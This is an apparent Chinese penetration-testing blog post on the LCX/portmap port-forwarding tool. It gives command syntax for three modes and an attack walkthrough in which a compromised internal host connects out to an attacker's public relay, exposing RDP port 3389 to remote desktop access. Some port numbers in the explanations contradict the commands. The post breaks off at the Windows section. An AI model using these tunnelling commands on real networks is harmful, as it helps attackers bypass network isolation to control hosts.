网站Logo Tmx'blogs
Tmx · 主站Tmx · 博客Tmx · 工具
学习文章IP奇遇记
四方好友
相册集瞬间足迹
关于本人我的装备

内网渗透——流量转发

tmx8911
5
2025-05-21

【一】工具介绍

LCX(Local eXecute)是渗透测试中常用的一款端口转发工具,主要用于在目标机器受限的网络环境中进行端口转发,常用于 内网渗透 中打通受限网络。
它的核心作用是:实现端口的映射和转发,打通内外网通信通道

该工具支持三种端口转发模式:正向转发、双监听、反向连接,可用于打通外网与内网之间的通信隧道。

  • 第一个功能将本地端口转发到远程主机某个端口上
  • 第二个功能将本地端口转发到本地另一个端口上
  • 第三个功能是进行监听并进行转发使用

LCX 工具常用于被控主机处于内网环境时的端口转发操作。在实际渗透场景中,即便已经通过木马或其他方式获得了目标主机的控制权限,但由于内网隔离的限制,依然无法直接通过远程终端(如 RDP)对其进行图形化管理与操作,这在一定程度上限制了后续渗透工作的效率和便捷性。

因此,很多情况下,攻击者会设法在目标主机上启用 3389 远程桌面端口,并借助 LCX 工具进行端口转发,使外网主机能够访问内网中的远程服务。通常情况下,外网主机是无法直接访问处于内网的目标主机的,但如果内网主机可以连接公网(如能 ping 通互联网),就可以利用 LCX 实现通信通道的“反向打通”。

具体做法是:将内网主机上的某个端口通过 LCX 转发映射到攻击者外网服务器的某个端口,然后,攻击者可在本地使用远程桌面客户端(如 mstsc 外网:转发的监听端口),通过 LCX 建立的转发通道,间接访问目标内网主机的 3389 远程桌面服务,从而实现对目标主机的图形化远程控制,就像直接访问本地计算机一样。

本质上,LCX 的功能就像是在内网主机与外网攻击者之间搭建了一条“隧道”,实现了类似于在路由器上设置端口映射的效果,从而绕过了内网隔离带来的访问限制。

【二】工具的使用方法

【1】Linux版LCX-portmap

Linux版LCX通常是一个命令行工具,用于内网穿透和端口转发。由于Linux系统自带丰富的网络工具,可以通过命令行方便地运行和集成LCX。

linux下的工具名称为portmap

命令格式:

./portmap -m <模式编号> [-h1 主机1] -p1 端口1 [-h2 主机2] -p2 端口2 [-v] [-log 文件名]
参数 说明
-m 模式编号(1、2、3)
-h1 主机1(仅模式3使用)
-p1 端口1
-h2 主机2(目标主机地址)
-p2 端口2
-v 显示版本信息
-log 日志记录通信数据

🔁 模式详解

✅ 模式 1:正向端口转发(Listen → Connect)

  • 用途:在“中转机”上监听某端口,将流量转发到目标主机的某端口
    ⚠️ 仅适用于 中转机能直接访问目标主机 IP:端口 的情况。

  • 注意: 如果中转机无法访问 192.168.1.100(比如它在内网,未做穿透),此方法将失败!

  • 典型应用场景

    • 同一内网环境中转发端口
    • VPN/内网穿透已打通
    • 云服务器通过内网专线或安全组打通了内网服务器
./portmap -m 1 -p1 8888 -h2 192.168.1.100 -p2 3389

📌 效果:监听本地 8888 端口,转发到 192.168.1.100:3389(目标主机远程桌面)。

✅ 模式 2:双端监听(Listen → Listen)

  • 用途:在中转机上同时监听两个端口,实现两端数据互通。
  • 🎯 目标主机(中转机/跳板机)执行:
./portmap -m 2 -p1 8888 -p2 9999

📌 效果:公网服务器监听 1234 和 8888,连接这两个端口的主机可以互相通信。

✅ 模式 3:反向连接(Connect → Connect)

  • 用途:用于目标主机处于内网或受限环境时,主动连接公网服务器,打通反向通信隧道。
  • 🎯 内网目标主机执行:
./portmap -m 3 -h1 公网IP -p1 1234 -h2 127.0.0.1 -p2 3389

📌 效果:内网主机连接公网IP:1234(建立中转通道),并绑定本地 3389(远程桌面)端口用于转发。

🧩 实战组合案例:内网主机 RDP 远程穿透

✅ 场景说明:

内网主机开启了 3389 服务,但攻击者无法直接访问。通过端口转发,将内网 RDP 暴露至公网。

🔹 步骤一:公网服务器开启双监听(中转)

./portmap -m 2 -p1 1234 -p2 8888

📌 公网服务器监听两个端口,用于中转连接。(是很有必要的)
模式2(双监听)会让服务器监听两个端口
一个给内网主机连接(比如 1234
一个给攻击者连接(比如 8888
🔁 内网主机接入 → 中转服务器内部转发 → 攻击者连接

需要注意的是这与内网穿透不一样:🌐 “将内网主机3389端口映射到公网服务器1234端口”,攻击者直接连接公网IP:1234。这种功能叫做端口映射 + SOCKS代理 + 隧道穿透

🔹 步骤二:内网主机主动连接公网服务器

./portmap -m 3 -h1 公网IP -p1 1234 -h2 127.0.0.1 -p2 3389

📌 将内网主机的本地 3389 端口映射至公网服务器的 8888 端口。

🔹 步骤三:攻击者连接内网主机远程桌面

mstsc 公网IP:8888

📌 成功通过公网远程访问内网主机的桌面环境。

【2】Windows版LCX

动物装饰